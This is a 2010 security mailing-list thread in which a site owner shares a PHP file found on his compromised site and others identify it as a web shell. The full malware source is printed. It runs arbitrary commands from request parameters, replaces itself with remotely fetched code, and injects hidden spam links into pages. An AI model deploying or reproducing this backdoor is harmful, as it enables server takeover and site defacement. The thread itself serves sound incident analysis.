here is the function system. http://us.php.net/manual/en/function.system.php
looks like it could be pretty nasty. -Brad On Mon, Mar 1, 2010 at 11:29 AM, Andrew Ellis <[email protected]> wrote: > This is pretty heavily obscured (obviously), but the structure and > some of the things it's doing is reminiscent of PHP Shell, like C99. > > Code like: > function Com() > { > if (isset($_POST['c'])) > �...@system($_POST['c']); > if (isset($_GET['c'])) > �...@system($_GET['c']); > } > Is used to pass things through the web-page to the server, allowing > the malicious user to control things more granularly. > > I copied all the code you posted to a server and ran it through php at > the command line. If you add in something like $_POST['c'] = "ls > > test.txt" to the top of the file and run it, you'll find no output on > the page, but a nicely created test.txt file with the contents of the > directory containing this script... > > Sad to say, looks like you were 0wned. > > > > On Mon, Mar 1, 2010 at 3:16 AM, Adrian Crenshaw <[email protected]> wrote: >> Ok, I think one of my sites may have been compromised. I found the following >> PHP script on a site, but I'm not sure what it is trying to do. Anyone else >> ever seen this script before? >> >> Adrian >> >> <?php >> ignore_user_abort(1); >> set_time_limit(0); >> >> function Clear() >> { >> unlink("c"); >> unlink("1r"); >> unlink("log"); >> } >> >> function Clear2() >> { >> $mrd = trim(file_get_contents("m")); >> $pt = "../$mrd"; >> $fin = file_get_contents($pt); >> $fin = ereg_replace("<adsttnmq1>(.*)<sdioyslkjs2>", "", $fin); >> $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin); >> $fin = preg_replace('#<a[^>]+\_lm[^>]*>.*?</a>#is', '', $fin); >> $fin = preg_replace("/http(.*?)tmp6(.*?)\<\/a\>/", "", $fin); >> $fin = ereg_replace("<!--dd4-->", "", $fin); >> $fin = ereg_replace("<!--dd5-->", "", $fin); >> $fin = ereg_replace("<font style=\"position: absolute;overflow: >> hidden;height: 0;width: 0\">", "", $fin); >> $fmrd = fopen($pt, "w+"); >> fwrite($fmrd, $fin); >> fclose($fmrd); >> echo " upt-ok"; >> } >> >> function GetVar($name, &$var) >> { >> $var = ""; >> if (isset($_POST[$name])) >> $var = $_POST[$name]; >> >> if (isset($_GET[$name])) >> $var = $_GET[$name]; >> >> if (($var) =="") >> return false; >> else return true; >> } >> >> function Gen() >> { >> $alp = "abcdefghiklmnjsweqrtyuiopzx"; >> $maps = array(); >> if (isset($_POST["sg"])) >> $sg = $_POST["sg"]; >> >> if (isset($_GET["sg"])) >> $sg = $_GET["sg"]; >> >> if (isset($_POST["gm"])) >> $g = $_POST["gm"]; >> >> if (isset($_GET["gm"])) >> $g = $_GET["gm"]; >> >> >> $path = ""; >> $fr = fopen("1r", "a+"); >> if (file_exists("c")) >> { >> $fconf = file("c"); >> $tname = trim($fconf[0]); >> $cname = trim($fconf[1]); >> $curs = trim($fconf[2]); >> $pid = trim($fconf[3]); >> if ($pid == 100) >> { >> $pid = 0; >> $rnd = mt_rand(0, 999); >> $nm = ""; >> for ($i=0; $i<3; $i++) >> { >> $ran = mt_rand(0,26); >> $sym = $alp[$ran]; >> $nm = $nm.$sym; >> } >> $cname = $nm; >> mkdir("$tname/$cname"); >> $curs = $g; >> } >> } >> else >> { >> $rnd = mt_rand(0, 999); >> $nm = ""; >> for ($i=0; $i<5; $i++) >> { >> $ran = mt_rand(0,26); >> $sym = $alp[$ran]; >> $nm = $nm.$sym; >> } >> $tname = $nm; >> $pid = 0; >> $curs = $g; >> mkdir($tname); >> $fht = fopen("$tname/.htaccess", "w+"); >> $htname = $sg."2.txt"; >> $fp = fopen($htname, "r"); >> $fin = ''; >> while (!feof($fp)) >> { >> $fc = fgets($fp, 1024); >> if (!$fc) break; >> $fin .= $fc; >> } >> fclose($fp); >> fwrite($fht, $fin); >> fclose($fht); >> $rnd = mt_rand(0, 999); >> $nm = ""; >> for ($i=0; $i<3; $i++) >> { >> $ran = mt_rand(0,26); >> $sym = $alp[$ran]; >> $nm = $nm.$sym; >> } >> $cname = $nm; >> mkdir("$tname/$cname"); >> } >> $gname = $sg."sgen.php"; >> for ($j=$pid; $j<$pid+10; $j++) >> { >> $fp = fopen($gname."?g=$curs", "r"); >> $fin = ''; >> while (!feof($fp)) >> { >> $fc = fgets($fp, 1024); >> if (!$fc) break; >> $fin .= $fc; >> } >> fclose($fp); >> >> $fnd = fopen("$tname/$cname/$curs"."_$j.htm", "w+"); >> fwrite($fnd, $fin); >> fclose($fnd); >> } >> >> if ($j==100) >> { >> $fp = fopen($gname."?g=$curs&m=1", "r"); >> $fin = ''; >> while (!feof($fp)) >> { >> $fc = fgets($fp, 1024); >> if (!$fc) break; >> $fin .= $fc; >> } >> fclose($fp); >> $fnd = fopen("$tname/$cname/$curs"."_lm.htm", "w+"); >> fwrite($fnd, $fin); >> fclose($fnd); >> $map = "$path/$tname/$cname/$curs"."_lm.htm"; >> fwrite($fr,"$map\n"); >> } >> >> $fconf = fopen("c", "w+"); >> fwrite($fconf, $tname."\n"); >> fwrite($fconf, $cname."\n"); >> fwrite($fconf, $curs."\n"); >> $nj = $j; >> fwrite($fconf, $nj."\n"); >> fclose($fconf); >> } >> >> function Update() >> { >> $thisname = "1.php"; >> if (isset($_POST['u'])) >> $u = $_POST['u']; >> >> if (isset($_GET['u'])) >> $u = $_GET['u']; >> >> $fp = fopen($u, "r"); >> $fin = ''; >> while (!feof($fp)) >> { >> $fc = fgets($fp, 1024); >> if (!$fc) break; >> $fin .= $fc; >> } >> fclose($fp); >> >> $fthis = fopen($thisname, "w+"); >> fwrite($fthis, $fin); >> fclose($fthis); >> } >> >> function Com() >> { >> if (isset($_POST['c'])) >> @system($_POST['c']); >> if (isset($_GET['c'])) >> @system($_GET['c']); >> } >> >> function UpKos() >> { >> $mrd = trim(file_get_contents("m")); >> $pt = "../$mrd"; >> $fin = file_get_contents($pt); >> $fin = ereg_replace("adsttnmq1", "<adsttnmq1>", $fin); >> $fin = ereg_replace("sdioyslkjs2", "<sdioyslkjs2>", $fin); >> $fmrd = fopen($pt, "w+"); >> fwrite($fmrd, $fin); >> fclose($fmrd); >> } >> >> >> function MRepl() >> { >> $mpt = ""; >> $drs = ""; >> $begtag = "<adsttnmq1><font style=\"position: absolute;overflow: >> hidden;height: 0;width: 0\">"; >> $endtag = "</font></body></html><sdioyslkjs2> "; >> $mrd = trim(file_get_contents("m")); >> $pt = "../$mrd"; >> $fin = file_get_contents($pt); >> GetVar("mpt", $mpt); >> // óäàëÿåì çàâåðøàþùèå õòìë òåãè >> $fin = preg_replace ("/<\/body>/i", "", $fin); >> $fin = preg_replace ("/<\/html>/i", "", $fin); >> $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin); >> $fin = ereg_replace("<adsttnmq1>(.*)<sdioyslkjs2>", "", $fin); >> $fp = fopen($mpt, "r"); >> GetVar("drs", $drs); >> $fin = $fin.$begtag; >> $drs = str_replace("\\", "", $drs); >> $fin = $fin.$drs; >> $fin = $fin.$endtag; >> $fmrd = fopen($pt, "w+"); >> fwrite($fmrd, $fin); >> fclose($fmrd); >> } >> >> function Main() >> { >> if (isset($_POST['u']) || isset($_GET['u'])) >> { >> Update(); >> exit(); >> } >> >> if (isset($_POST['c']) || isset($_GET['c'])) >> { >> Com(); >> exit(); >> } >> >> if (isset($_POST['uk']) || isset($_GET['uk'])) >> { >> UpKos(); >> exit(); >> } >> >> if (isset($_POST['g']) || isset($_GET['g'])) >> { >> Gen(); >> exit(); >> } >> >> if (isset($_POST['s']) || isset($_GET['s'])) >> { >> MRepl(); >> exit(); >> } >> >> if (isset($_POST['cl']) || isset($_GET['cl'])) >> { >> Clear(); >> exit(); >> } >> >> if (isset($_POST['cl2']) || isset($_GET['cl2'])) >> { >> Clear2(); >> exit(); >> } >> >> echo "<ok>"; >> >> } >> >> Main(); >> >> ?> >> >> _______________________________________________ >> Pauldotcom mailing list >> [email protected] >> http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom >> Main Web Site: http://pauldotcom.com >> > > > > -- > Andrew Ellis > http://blog.psych0tik.net > _______________________________________________ > Pauldotcom mailing list > [email protected] > http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom > Main Web Site: http://pauldotcom.com > _______________________________________________ Pauldotcom mailing list [email protected] http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom Main Web Site: http://pauldotcom.com
